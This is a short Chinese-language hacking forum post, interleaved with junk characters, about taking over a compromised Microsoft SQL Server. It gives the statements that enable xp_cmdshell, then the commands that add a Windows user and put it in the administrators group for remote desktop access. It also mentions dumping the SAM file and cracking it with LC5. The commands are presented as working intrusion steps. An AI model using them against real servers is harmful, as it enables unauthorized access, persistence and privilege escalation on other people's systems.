saitojie

; Y: m% `& ], O
( @! ~1 q! z$ z. P

& _  {3 o) o' A/ q2 ^& y# i于是开始找开启语句，对mssql的玩的少，不是太熟悉！
) T. @% [% D( N; l后来二少给我了语句，便去继续日之8 C+ S6 b: `" m" f% U
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;$ C3 e1 B8 X# C
1为开启，0则为关闭！
, ]4 @0 z% l& ~- F6 Y$ ^& h; \* b然后执行% j* L. _0 @, k
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c net user xx xx /add'1 p1 V. b# f+ n* G
即可
5 J# B1 D. r6 Y" N) F. u回过头去看看，发现用户已经成功添加上了！& F+ g+ x* H  b3 |  d" O8 u. ^+ }5 q

1 Q7 C: P' L: S我就不明白BKK了，这个地方，你都已经加上用户了，为什么不直接加入到管理组里面，连接服务器的3389呢，为什么还要去下他的SAM，还用LC5去爆力破解呢！~~~~不明白！~~~
! ]- A6 E/ ]9 ~EXEC [master].[dbo].[xp_cmdshell] 'net localgroup administrators username /add'，难道是因为他的3389做了登陆用户的限制？